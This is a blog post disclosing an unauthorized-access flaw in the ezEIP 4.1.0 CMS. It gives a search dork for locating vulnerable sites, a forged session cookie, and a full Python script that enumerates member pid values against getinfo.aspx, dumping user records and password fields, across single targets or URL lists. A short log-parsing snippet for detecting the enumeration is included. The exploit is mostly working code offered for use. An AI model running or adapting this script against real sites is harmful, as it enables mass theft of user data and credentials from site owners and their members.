ezEIP 4.1.0: Unauthorized Access Leads to Information Disclosure
Author: Iamyc    Wednesday, 14 April 2021, 09:29    Views: 120

1. Version

+=============oOO====(_)================+
| Powered By wanhu - www.wanhu.com.cn   |
| Tel:400-888-0035 020-85575672         |
| Creation:2015.06.27                   |
| ezEip v4.1.0                          |
+==========================oOO==========+

2. Development environment

aspx / ASP.NET / IIS

3. Google dork

powered by wanhu

Or search for it directly on fofa or zoomeye.

4. Exploitation payload

1. Request http://**.com/label/member/getinfo.aspx; a response of [] means the file exists.

2. Reload the request with this cookie added:

WHIR_USERINFOR=whir_mem_member_pid=1;

3. You can write a script to iterate the pid parameter, because on some instances the user records do not start at 1; one I found started at 75.

The Key11239 field is the password, but I don't know what encoding it uses; it looks like base64 but isn't.
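A defender-side check for the pid walk described above, added here as an example and not part of the original post: it parses IIS W3C log lines (a constructed sample, assuming the optional cs(Cookie) field is enabled in the site's logging) and flags any client that sent many distinct whir_mem_member_pid values to getinfo.aspx, something a legitimate logged-in session never does.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed IIS W3C excerpt (not from the post); assumes cs(Cookie) logging is on.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 8.5
#Fields: date time cs-method cs-uri-stem c-ip cs(Cookie) sc-status
2021-04-14 01:29:01 GET /label/member/getinfo.aspx 203.0.113.7 WHIR_USERINFOR=loginname=test321&whir_mem_member_pid=1&gradeid=8 200
2021-04-14 01:29:02 GET /label/member/getinfo.aspx 203.0.113.7 WHIR_USERINFOR=loginname=test321&whir_mem_member_pid=2&gradeid=8 200
2021-04-14 01:29:02 GET /label/member/getinfo.aspx 203.0.113.7 WHIR_USERINFOR=loginname=test321&whir_mem_member_pid=3&gradeid=8 200
2021-04-14 01:29:03 GET /label/member/getinfo.aspx 203.0.113.7 WHIR_USERINFOR=loginname=test321&whir_mem_member_pid=4&gradeid=8 200
2021-04-14 01:30:10 GET /label/member/getinfo.aspx 198.51.100.20 WHIR_USERINFOR=loginname=alice&whir_mem_member_pid=75&gradeid=8 200
2021-04-14 01:31:44 GET /index.aspx 198.51.100.20 - 200
"""

TARGET = "/label/member/getinfo.aspx"
PID_RE = re.compile(r"whir_mem_member_pid=(-?\d+)")


def parse_w3c(text):
    """Yield one dict per log record, keyed by the names in the #Fields line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split(" ")
            if len(parts) == len(fields):  # skip truncated lines
                yield dict(zip(fields, parts))


def pids_per_client(text):
    """Map each client IP to the set of pid values it sent to getinfo.aspx."""
    seen = defaultdict(set)
    for rec in parse_w3c(text):
        if rec["cs-uri-stem"] != TARGET:
            continue
        m = PID_RE.search(unquote(rec.get("cs(Cookie)", "")))
        if m:
            seen[rec["c-ip"]].add(int(m.group(1)))
    return seen


def flag_enumeration(text, threshold=3):
    """Return clients that presented more than `threshold` distinct pids.
    A real login carries one pid; many distinct values from one client is the pid walk."""
    return sorted(ip for ip, pids in pids_per_client(text).items()
                  if len(pids) > threshold)
```

On a real server the same counting can be run over the site's daily W3C log; the threshold is a tuning knob, since a single account changing pid even once is already worth a look.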

5. Exploit

python3 yc_ezeip.py -u http://*.com



import sys
import getopt
import requests

requests.adapters.DEFAULT_RETRIES = 5
i = 0  # number of targets tested so far


def exp(url):
    global i
    i += 1
    x = url.rstrip("/")
    print("[" + str(i) + "]Test %s" % x)

    url = x + "/label/member/getinfo.aspx"

    print("[*]getinfo.aspx exists!")
    # Walk the pid value; some installs do not start at 1 (see section 4)
    for xx in range(-100, 10000):
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.6) ",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "en-us",
            "Connection": "keep-alive",
            "Accept-Charset": "GB2312,utf-8;q=0.7,*;q=0.7",
            "Cookie": "WHIR_USERINFOR=loginname=test321&realname=root&whir_mem_member_pid=" + str(xx) + "&password=PmYd5JaQD0ltYOrrPNm6WA%3d%3d&gradeid=8&groupid=2;",
        }
        print("[*]Trying %s" % str(xx))
        html2 = requests.get(url, headers=headers)
        if len(html2.text) > 3 and "Key" in html2.text:
            print("[+]Vul is exists>>%s" % x)
            print(html2.text)

            # Record the hit; the context manager closes the file even on error
            try:
                with open('success.txt', 'a') as ff:
                    ff.write(x + "|pid=" + str(xx) + "\n")
            except OSError:
                pass

            # break


if __name__ == '__main__':
    argv = sys.argv[1:]
    try:
        opts, args = getopt.getopt(argv, "u:f:")
    except getopt.GetoptError:
        print("python yc_ezeip.py -u http://site")
        print("python yc_ezeip.py -f url.txt")
        sys.exit(1)

    for opt, arg in opts:
        if opt == '-u':
            exp(arg)
        elif opt == '-f':
            # One target URL per line
            with open(arg, 'r') as fp:
                for line in fp:
                    line = line.strip()
                    if line:
                        exp(line)
                



Addendum 2021-04-20: a couple of days ago I saw a guy on T00ls (土司) posting an ezEIP password-decryption script; I tried it and it really does decrypt, hahaha!

I also spent 50 tubi on the source code; I'm going to audit it.

Author: Iamyc      Title: ezEIP 4.1.0: Unauthorized Access Leads to Information Disclosure
URL: http://lang-v.com/first_cms/yc/emlog/src/?post=157
Copyright notice: unless stated otherwise, this article is original content of "YC's Blog"; please keep the source attribution when reposting.
